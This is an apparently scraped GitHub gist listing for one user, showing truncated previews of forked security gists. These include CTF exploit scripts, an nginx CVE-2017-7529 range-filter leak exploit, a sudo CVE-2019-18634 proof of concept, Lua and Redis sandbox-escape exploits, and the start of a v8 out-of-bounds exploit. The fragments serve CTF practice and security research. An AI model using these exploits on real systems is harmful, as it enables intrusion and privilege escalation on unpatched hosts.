##Create a new repository on the command line
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin git@github.com:alexpchin/.git
infernalheaven
infernalheaven
/ www.py
Created
May 14, 2018 06:08
— forked from dwendt/www.py
dc18 quals, all the good parts of this code belong to jeffball
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from pow import solve_pow | |
| #from network_util import * | |
| import struct | |
| #fd = open("m68k.bin", "r") | |
| #shellcode = fd.read() | |
| #fd.close() | |
| def p32(v): | |
| return struct.pack(">i",v) |
infernalheaven
/ Setting_upa_new_repo.md
Created
August 15, 2018 16:19
— forked from alexpchin/Setting_upa_new_repo.md
Create a new repository on the command line
infernalheaven
/ 1_stringer_writeup.md
Created
August 16, 2018 10:45
— forked from romanking98/1_stringer_writeup.md
rctf-2018-exploits
Challenge from RCTF, prequals to XCTF.
There are 2 bugs in the program : the first is an obvious UAF. The second is no NULL termination immediately after our input, allowing us to leak. NULL byte terminates at buf + size - 1, read loop breaks if buf == "\n"
However, leaking is tricky since program uses calloc, which sets the newly allocated heap chunk to 0x00.
infernalheaven
/ CVE-2017-7529.py
Created
August 25, 2018 11:52
— forked from BlackVirusScript/CVE-2017-7529.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable | |
| # to integer overflow vulnerability in nginx range filter module resulting into leak | |
| # of potentially sensitive information triggered by specially crafted request. | |
| # * CVE-2017-7529 | |
| # - By @BlackViruScript / @Black#4544 | |
| import urllib.parse, requests, argparse | |
| global colorama, termcolor | |
| try: | |
| import colorama, termcolor | |
| colorama.init(autoreset=True) |
infernalheaven
/ malloc_hook.js
Created
January 12, 2019 18:48
— forked from n30m1nd/malloc_hook.js
Frida hooks for malloc functions for further inspection.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict'; | |
| var mallocPtr = Module.findExportByName("libc.so.6", "malloc"); | |
| var malloc = new NativeFunction(mallocPtr, 'pointer', ['long']); | |
| var freePtr = Module.findExportByName("libc.so.6", "free"); | |
| var freel = new NativeFunction(freePtr, 'void', ['pointer']); | |
| var reallocPtr = Module.findExportByName("libc.so.6", "realloc"); | |
| var reallocl = new NativeFunction(reallocPtr, 'pointer', ['pointer', 'int']); |
infernalheaven
/ fuzzing-bgpd-afl.md
Created
April 20, 2019 16:33
— forked from qlyoung/fuzzing-bgpd-afl.md
fuzzing frr bgpd with afl
infernalheaven
/ Exploiting Lua 5.1 on 32-bit Windows.md
Created
June 22, 2019 14:33
— forked from corsix/Exploiting Lua 5.1 on 32-bit Windows.md
The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt, which in turn loads a DLL from within an extremely locked down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works by a whirlwind tour of relevent bits of the Lua 5.1 virtual machine.
if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
error("This generator requires a 32-bit version of Lua 5.1")
end
local function outer()
local magic -- In bytecode, the stack slot corresponding to this local is changed
infernalheaven
/ redis-lua-linux-x86-poc.py
Created
February 6, 2020 15:21
— forked from c3c/redis-lua-linux-x86-poc.py
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Redis Lua 5.1 sandbox escape 32-bit Linux exploit | |
| ## Original exploit by corsix and sghctoma | |
| ## Author: @c3c | |
| ## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode | |
| ## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486 | |
| ## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different | |
| ## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf | |
| ## This code is much the same, except the process is done using pwntools' DynELF | |
| ## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version |
infernalheaven
/ CVE-2019-18634.py
Created
February 10, 2020 21:31
— forked from wbowling/CVE-2019-18634.py
POC for CVE-2019-18634
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import os | |
| import pty | |
| from pwn import process, sleep, write, read, listen, p64 | |
| """ | |
| From https://github.com/sudo-project/sudo/blob/SUDO_1_8_30/src/tgetpass.c#L401: | |
| } else if (c == sudo_term_kill) { |
infernalheaven
/ pwn.js
Created
February 10, 2020 21:35
— forked from wbowling/pwn.js
starCTF (*CTF) 2019 oob-v8
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // uses https://github.com/saelo/jscpwn/blob/master/utils.js | |
| var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]); | |
| let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {}); | |
| let f = wasm_mod.exports.hello; | |
| var arr1 = [1.1]; | |
| var arr2 = [Date]; | |
| var arr_map1 = arr1.oob(); | |
| var arr_map2 = arr2.oob(); |